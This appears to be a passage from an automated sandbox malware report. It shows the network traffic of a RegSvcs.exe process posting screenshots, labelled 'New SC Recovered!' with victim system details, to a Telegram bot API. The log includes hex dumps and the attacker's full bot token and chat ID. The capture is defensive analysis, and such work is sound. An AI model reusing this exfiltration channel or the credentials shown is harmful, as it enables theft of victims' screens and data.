                                                                                      16192.168.2.450028149.154.167.2204432476C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-06 04:54:12 UTC262OUTPOST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=---------------------------8dd6453ae6e3e4e
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 66944
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      2024-12-06 04:54:13 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 34 35 33 61 65 36 65 33 65 34 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 34 35 33 61 65 36 65 33 65 34 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 31 36 2f 32 30 32 35 20 30 36 3a 31 37 3a 34 35 0a 55 73 65 72
                                                                                      Data Ascii: -----------------------------8dd6453ae6e3e4eContent-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd6453ae6e3e4eContent-Disposition: form-data; name="caption"New SC Recovered!Time: 03/16/2025 06:17:45User
                                                                                      2024-12-06 04:54:13 UTC16355OUTData Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3
                                                                                      Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T
                                                                                      2024-12-06 04:54:13 UTC16355OUTData Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0
                                                                                      Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
                                                                                      2024-12-06 04:54:13 UTC16355OUTData Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a
                                                                                      Data Ascii: |w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
                                                                                      2024-12-06 04:54:13 UTC15447OUTData Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40
                                                                                      Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
                                                                                      2024-12-06 04:54:13 UTC1358OUTData Raw: 28 a2 98 05 14 51 40 1a f7 3e 27 d7 2e 2e a5 9f fb 56 f2 2f 31 cb f9 71 5c 3a a2 e4 e7 0a 33 c0 1d aa 39 75 cb e9 e7 86 7b 89 3c f9 a2 b6 92 db cc 94 b3 33 2b 87 04 92 4f 24 09 0e 3e 82 b3 28 a4 17 0a 28 a2 80 0a 28 a2 98 1d 74 de 31 8a e6 38 92 5b 47 8f cb 5c 02 ac 1b 3f cb 1d 2a 49 bc 6d 0c f1 79 4d a6 98 81 ea eb 20 63 f9 60 7f 3a e3 68 ac 95 28 25 04 97 c3 aa df bd c6 e4 db 93 fe 6d ce 8b 58 f1 2a ea 3a 42 e9 c9 6c ca aa e1 bc c6 6e 4e 33 db 1e fe b5 ce d1 45 54 62 a3 7b 75 77 06 db b2 7d 02 8a 28 aa 11 bd a5 6a c8 22 58 27 6d 8c bc 2b 7a 8a eb b4 dd 4e ee e1 b6 bd e0 10 20 cb c8 76 83 8f 4d dd 7f 5a f3 3a 2b 9e a5 17 24 d4 25 6b 99 c6 9a 8c f9 ba 76 3b 7f 15 78 9e 07 b5 7b 0b 09 04 86 41 89 24 5e 80 7a 0f 5a e2 28 a2 8c 3e 1e 18 78 72 40 e8 a9 51 d4
                                                                                      Data Ascii: (Q@>'..V/1q\:39u{<3+O$>(((t18[G\?*ImyM c`:h(%mX*:BlnN3ETb{uw}(j"X'm+zN vMZ:+$%kv;x{A$^zZ(>xr@Q
                                                                                      2024-12-06 04:54:13 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 34 35 33 61 65 36 65 33 65 34 65 2d 2d 0d 0a
                                                                                      Data Ascii: -----------------------------8dd6453ae6e3e4e--
                                                                                      2024-12-06 04:54:13 UTC25INHTTP/1.1 100 Continue
                                                                                      2024-12-06 04:54:14 UTC1510INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Fri, 06 Dec 2024 04:54:13 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 1121
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      {"ok":true,"result":{"message_id":170412,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460853,"document":{"file_name":"user-610930 2025-03-16 06-27-52.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZrGdSg3UOFByhuHW4NO_aVKZpNEPXAAL5FAACOh6ZUl3ZKvwpHZsiAQAHbQADNgQ","file_unique_id":"AQAD-RQAAjoemVJy","file_size":12290,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZrGdSg3UOFByhuHW4NO_aVKZpNEPXAAL5FAACOh6ZUl3ZKvwpHZsiAQAHbQADNgQ","file_unique_id":"AQAD-RQAAjoemVJy","file_size":12290,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECmaxnUoN1DhQcobh1uDTv2lSmaTRD1wAC-RQAAjoemVJd2Sr8KR2bIjYE","file_unique_id":"AgAD-RQAAjoemVI","file_size":66323},"caption":"New SC Recovered!\n\nTime: 03/16/2025 06:17:45\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 819 [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      17192.168.2.450029149.154.167.2204432476C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-06 04:54:19 UTC262OUTPOST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=---------------------------8dd6834711be7f9
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 66944
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      2024-12-06 04:54:19 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 38 33 34 37 31 31 62 65 37 66 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 38 33 34 37 31 31 62 65 37 66 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 32 31 2f 32 30 32 35 20 30 34 3a 35 34 3a 32 30 0a 55 73 65 72
                                                                                      Data Ascii: -----------------------------8dd6834711be7f9Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd6834711be7f9Content-Disposition: form-data; name="caption"New SC Recovered!Time: 03/21/2025 04:54:20User
                                                                                      2024-12-06 04:54:19 UTC16355OUTData Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3
                                                                                      Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T
                                                                                      2024-12-06 04:54:19 UTC16355OUTData Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0
                                                                                      Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
                                                                                      2024-12-06 04:54:19 UTC16355OUTData Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a
                                                                                      Data Ascii: |w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
                                                                                      2024-12-06 04:54:19 UTC15447OUTData Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40
                                                                                      Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
                                                                                      2024-12-06 04:54:19 UTC1358OUTData Raw: 28 a2 98 05 14 51 40 1a f7 3e 27 d7 2e 2e a5 9f fb 56 f2 2f 31 cb f9 71 5c 3a a2 e4 e7 0a 33 c0 1d aa 39 75 cb e9 e7 86 7b 89 3c f9 a2 b6 92 db cc 94 b3 33 2b 87 04 92 4f 24 09 0e 3e 82 b3 28 a4 17 0a 28 a2 80 0a 28 a2 98 1d 74 de 31 8a e6 38 92 5b 47 8f cb 5c 02 ac 1b 3f cb 1d 2a 49 bc 6d 0c f1 79 4d a6 98 81 ea eb 20 63 f9 60 7f 3a e3 68 ac 95 28 25 04 97 c3 aa df bd c6 e4 db 93 fe 6d ce 8b 58 f1 2a ea 3a 42 e9 c9 6c ca aa e1 bc c6 6e 4e 33 db 1e fe b5 ce d1 45 54 62 a3 7b 75 77 06 db b2 7d 02 8a 28 aa 11 bd a5 6a c8 22 58 27 6d 8c bc 2b 7a 8a eb b4 dd 4e ee e1 b6 bd e0 10 20 cb c8 76 83 8f 4d dd 7f 5a f3 3a 2b 9e a5 17 24 d4 25 6b 99 c6 9a 8c f9 ba 76 3b 7f 15 78 9e 07 b5 7b 0b 09 04 86 41 89 24 5e 80 7a 0f 5a e2 28 a2 8c 3e 1e 18 78 72 40 e8 a9 51 d4
                                                                                      Data Ascii: (Q@>'..V/1q\:39u{<3+O$>(((t18[G\?*ImyM c`:h(%mX*:BlnN3ETb{uw}(j"X'm+zN vMZ:+$%kv;x{A$^zZ(>xr@Q
                                                                                      2024-12-06 04:54:19 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 38 33 34 37 31 31 62 65 37 66 39 2d 2d 0d 0a
                                                                                      Data Ascii: -----------------------------8dd6834711be7f9--
                                                                                      2024-12-06 04:54:20 UTC25INHTTP/1.1 100 Continue
                                                                                      2024-12-06 04:54:20 UTC1510INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Fri, 06 Dec 2024 04:54:20 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 1121
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      {"ok":true,"result":{"message_id":170413,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460860,"document":{"file_name":"user-610930 2025-03-21 04-54-20.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZrWdSg3zRwnxbx7s4wt5aGIxsNZbgAAL6FAACOh6ZUmT7DsHX6rGyAQAHbQADNgQ","file_unique_id":"AQAD-hQAAjoemVJy","file_size":12290,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZrWdSg3zRwnxbx7s4wt5aGIxsNZbgAAL6FAACOh6ZUmT7DsHX6rGyAQAHbQADNgQ","file_unique_id":"AQAD-hQAAjoemVJy","file_size":12290,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECma1nUoN80cJ8W8e7OMLeWhiMbDWW4AAC-hQAAjoemVJk-w7B1-qxsjYE","file_unique_id":"AgAD-hQAAjoemVI","file_size":66323},"caption":"New SC Recovered!\n\nTime: 03/21/2025 04:54:20\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 819 [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      18192.168.2.450030149.154.167.2204432476C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-06 04:54:24 UTC262OUTPOST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=---------------------------8dd6b8cf29bbe5c
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 66944
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      2024-12-06 04:54:24 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 62 38 63 66 32 39 62 62 65 35 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 62 38 63 66 32 39 62 62 65 35 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 32 35 2f 32 30 32 35 20 31 30 3a 34 35 3a 32 36 0a 55 73 65 72
                                                                                      Data Ascii: -----------------------------8dd6b8cf29bbe5cContent-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd6b8cf29bbe5cContent-Disposition: form-data; name="caption"New SC Recovered!Time: 03/25/2025 10:45:26User
                                                                                      2024-12-06 04:54:24 UTC16355OUTData Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3
                                                                                      Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T
                                                                                      2024-12-06 04:54:24 UTC16355OUTData Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0
                                                                                      Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
